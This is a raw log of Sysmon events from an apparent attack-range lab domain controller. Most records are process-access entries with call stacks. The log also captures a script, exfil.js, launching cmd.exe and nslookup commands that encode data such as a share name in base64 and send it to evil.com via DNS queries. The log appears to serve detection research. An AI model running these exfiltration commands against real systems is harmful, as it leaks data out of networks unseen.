C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-113F-000000005F02}5772C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxvalw.tmp 2>&1 10341000x8000000000000000197159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.521{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-123F-000000005F02}5884C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.521{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-123F-000000005F02}5884C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.506{2E1864BB-17B3-629A-123F-000000005F02}58848136C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-113F-000000005F02}5772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.506{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-123F-000000005F02}5884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.483{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-113F-000000005F02}5772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.483{2E1864BB-17A1-629A-783D-000000005F02}55526560C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-113F-000000005F02}5772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.490{2E1864BB-17B3-629A-113F-000000005F02}5772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxvalw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.467{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzjv.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.436{2E1864BB-17B3-629A-0F3F-000000005F02}33645828C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-103F-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.420{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.420{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-103F-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.420{2E1864BB-17B3-629A-0E3F-000000005F02}62086584C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-103F-000000005F02}3396C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.433{2E1864BB-17B3-629A-103F-000000005F02}3396C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B3-629A-0E3F-000000005F02}6208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzjv.tmp 2>&1 10341000x8000000000000000197139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.404{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-0F3F-000000005F02}3364C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.404{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B3-629A-0F3F-000000005F02}3364C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.404{2E1864BB-17B3-629A-0F3F-000000005F02}33645828C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-0E3F-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.403{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-0F3F-000000005F02}3364C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.399{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.398{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.398{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.383{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.383{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-0E3F-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.383{2E1864BB-17A1-629A-783D-000000005F02}55527260C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-0E3F-000000005F02}6208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.397{2E1864BB-17B3-629A-0E3F-000000005F02}6208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzjv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 